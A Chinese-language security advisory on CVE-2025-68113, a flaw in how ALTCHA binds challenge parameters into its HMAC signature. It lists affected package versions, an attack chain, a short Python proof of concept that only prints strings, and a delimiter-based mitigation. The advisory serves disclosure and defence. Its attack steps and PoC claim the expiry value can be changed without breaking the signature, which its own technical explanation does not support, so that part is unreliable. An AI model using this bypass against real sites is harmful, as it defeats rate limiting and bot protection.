CVE-2025-68113: ALTCHA加密语义绑定缺陷导致重放攻击

漏洞信息

漏洞编号

CVE-2025-68113

漏洞类型

加密缺陷/重放攻击

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ALTCHA (altcha-lib npm, altcha Golang, altcha Rubygem, altcha pip, altcha Erlang, altcha-org/altcha Composer, org.altcha:altcha Maven)

漏洞概述

CVE-2025-68113是ALTCHA验证码和机器人防护软件中的一个加密语义绑定缺陷漏洞。ALTCHA是一个隐私优先的防机器人保护解决方案，广泛用于网站和应用程序的验证码系统。该漏洞的核心问题在于HMAC签名机制没有明确地将挑战参数绑定到nonce，导致攻击者可以通过挑战负载拼接技术来修改有效的工作量证明提交中的过期时间值。这意味着攻击者可以重用之前已解决的挑战，超出其原始设定的生命周期限制。虽然该漏洞不直接影响数据的机密性或完整性，但它主要破坏了依赖ALTCHA的防滥用机制，包括速率限制和机器人缓解功能，从而可能允许攻击者绕过验证码保护进行暴力破解、自动化攻击或垃圾内容提交等恶意活动。

技术细节

该漏洞的根本原因在于ALTCHA库在计算HMAC签名时，挑战参数（如过期时间）与nonce之间缺乏明确的语义分离。具体来说，HMAC计算的输入格式可以被攻击者重新解析。例如，原始有效的签名可能是基于「salt?expires=1000」计算的，但攻击者可以将其重新解释为「salt?expires=1000&extra=value」，由于HMAC签名不包含参数边界信息，服务器可能错误地接受这个修改后的请求。攻击者通过在原始挑战字符串后追加额外参数（如延长过期时间），利用URL参数解析的歧义性来绕过有效期检查。这种攻击方式利用了HMAC签名验证与参数解析之间的逻辑不一致性，允许攻击者在不重新计算有效签名的情况下延长挑战的有效期。成功利用此漏洞需要攻击者能够拦截或获取有效的ALTCHA挑战响应，然后修改其中的时间参数以延长有效期。

攻击链分析

STEP 1

步骤1

攻击者获取有效的ALTCHA挑战响应，该响应包含正确的工作量证明和HMAC签名

STEP 2

步骤2

攻击者识别挑战响应中的expires参数及其在HMAC计算字符串中的位置

STEP 3

步骤3

攻击者修改expires值为更远的未来时间，同时保持原始HMAC签名不变

STEP 4

步骤4

攻击者将修改后的挑战响应重新提交给目标服务器

STEP 5

步骤5

服务器由于缺乏参数边界检查，错误地接受了带有修改后过期时间的挑战

STEP 6

步骤6

攻击者成功绕过验证码保护，可以继续执行暴力破解、自动化攻击或垃圾内容提交等恶意行为

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import hmac
import hashlib
import base64
import json

# Original valid ALTCHA challenge response
original_payload = {
    'algorithm': 'sha256',
    'salt': 'random_salt_value',
    'signature': 'original_hmac_signature_base64',
    'nonce': 'challenge_nonce_123',
    'pow': 'work_proof_value',
    'expires': 1000  # Original expiration timestamp
}

# Attack: Splice the payload by extending expiration
# The vulnerability allows modifying expires value without invalidating signature
modified_payload = original_payload.copy()
modified_payload['expires'] = 9999999999  # Extended expiration time

# Generate the string that would be signed (demonstrating the ambiguity)
def generate_hmac_input(salt, expires):
    # Original format - vulnerable to parameter splicing
    return f"{salt}?expires={expires}"

# Demonstrating the attack vector
original_input = generate_hmac_input(original_payload['salt'], original_payload['expires'])
modified_input = generate_hmac_input(original_payload['salt'], modified_payload['expires'])

# The same base string can be reinterpreted with modified parameters
# Attack: Append additional parameters to extend validity
attack_input = f"{original_payload['salt']}?expires={original_payload['expires']}&extended=true"

print(f"Original HMAC input: {original_input}")
print(f"Modified expiration: {modified_input}")
print(f"Attack payload: {attack_input}")
print("\n[!] The HMAC signature from original_input may be valid for attack_input due to lack of semantic binding")

影响范围

altcha Golang package < 1.0.0

altcha Rubygem < 1.0.0

altcha pip package < 1.0.0

altcha Erlang package < 1.0.0

altcha-lib npm package < 1.4.1

altcha-org/altcha Composer package < 1.3.1

org.altcha:altcha Maven package < 1.3.0

防御指南

临时缓解措施

如果无法立即升级到修复版本，可以在salt值末尾添加分隔符后再进行HMAC计算（例如使用`<salt>?expires=<time>&`格式）。这种缓解措施可以防止参数拼接攻击，因为它在参数后添加了明确的边界标记，使攻击者无法在不破坏签名的情况下追加额外参数。该方案向后兼容现有实现，因为添加的分隔符被服务器视为标准的URL参数分隔符。